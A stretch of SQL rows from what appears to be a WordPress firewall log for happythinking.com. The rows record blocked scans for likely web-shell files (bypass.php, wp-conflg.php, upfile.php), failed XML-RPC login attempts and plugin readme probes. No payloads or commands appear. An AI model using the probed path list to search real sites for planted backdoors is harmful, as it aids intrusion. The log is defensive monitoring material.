(50802, 1712000279.195310, 1712000278.695800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
(50740, 1711908200.422899, 1711908199.918400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/themes/digital-download/new.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2RpZ2l0YWwtZG93bmxvYWQvbmV3LnBocA==","category":"brute-force","ssl":1}'),
(50801, 1712000299.355821, 1712000298.873800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
(50741, 1711908197.266157, 1711908196.813100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/about.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50742, 1711908194.923793, 1711908194.448800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/themes/travel/issue.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3RyYXZlbC9pc3N1ZS5waHA=","category":"brute-force","ssl":1}'),
(50836, 1712011446.008247, 1712011445.600500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/about.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50800, 1712000320.627530, 1712000320.128700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}'),
(50743, 1711908190.271400, 1711908189.872000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/themes/aahana/json.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2FhaGFuYS9qc29uLnBocA==","category":"brute-force","ssl":1}'),
(50799, 1712000348.042171, 1712000347.608700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(50744, 1711908185.403812, 1711908184.940200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/themes/travelscape/json.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3RyYXZlbHNjYXBlL2pzb24ucGhw","category":"brute-force","ssl":1}'),
(50745, 0.000000, 1711910977.835126, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜*¶¿', 0, 200, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50746, 0.000000, 1711910983.823875, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜*¶¿', 0, 200, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50747, 1711919003.304878, 1711919002.924700, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50753, 0.000000, 1711942341.977243, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50754, 0.000000, 1711943178.897722, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', 'https://www.happythinking.com/xmlrpc.php', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64', 'loginFailInvalidUsername', NULL, NULL),
(50748, 1711918999.581010, 1711918998.883700, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50750, 0.000000, 1711927141.097331, '\0\0\0\0\0\0\0\0\0\0ÿÿõš¨', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50751, 0.000000, 1711942225.286643, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', 'https://www.happythinking.com/xmlrpc.php', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50752, 1711942228.138110, 1711942227.452500, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', 'https://www.happythinking.com/xmlrpc.php', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50749, 0.000000, 1711920096.757360, '\0\0\0\0\0\0\0\0\0\0ÿÿrtQä', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50755, 0.000000, 1711943181.755201, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', 'https://www.happythinking.com/xmlrpc.php', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64', 'loginFailInvalidUsername', NULL, NULL),
(50756, 0.000000, 1711943183.920460, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', 'https://www.happythinking.com/xmlrpc.php', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64', 'loginFailInvalidUsername', NULL, NULL),
(50757, 0.000000, 1711943187.562656, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', 'https://www.happythinking.com/xmlrpc.php', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64', 'loginFailInvalidUsername', NULL, NULL),
(50758, 0.000000, 1711943189.414758, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', 'https://www.happythinking.com/xmlrpc.php', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64', 'loginFailInvalidUsername', NULL, NULL),
(50759, 0.000000, 1711943191.352717, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', 'https://www.happythinking.com/xmlrpc.php', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64', 'loginFailInvalidUsername', NULL, NULL),
(50760, 1711954000.433585, 1711953996.517100, '\0\0\0\0\0\0\0\0\0\0ÿÿmø¯w', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt', NULL, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50761, 1711954000.433201, 1711953996.517100, '\0\0\0\0\0\0\0\0\0\0ÿÿmø¯w', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt', NULL, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50762, 1711956614.837434, 1711956614.356100, '\0\0\0\0\0\0\0\0\0\0ÿÿ-WÔL', 0, 403, 0, 0, 0, 'https://happythinking.com/', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjQ1LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDUuMA==","path":"Lw==","category":"brute-force","ssl":1}'),
(50763, 1711962188.124224, 1711962187.453900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/dummyyummy/wp-signup.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9kdW1teXl1bW15L3dwLXNpZ251cC5waHA=","category":"brute-force","ssl":1}'),
(50844, 1712062382.440534, 1712062381.886600, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(50798, 1711999794.183982, 1711999793.744100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(50764, 1711962186.124368, 1711962185.529400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-admin/dropdown.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(50765, 1711962182.276977, 1711962181.656300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/epinyins.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2VwaW55aW5zLnBocA==","category":"brute-force","ssl":1}'),
(50797, 1711999797.442239, 1711999796.884600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50766, 1711962177.636900, 1711962176.883000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/digital-download/new.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2RpZ2l0YWwtZG93bmxvYWQvbmV3LnBocA==","category":"brute-force","ssl":1}'),
(50837, 1712011443.753001, 1712011443.204800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/travel/issue.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3RyYXZlbC9pc3N1ZS5waHA=","category":"brute-force","ssl":1}'),
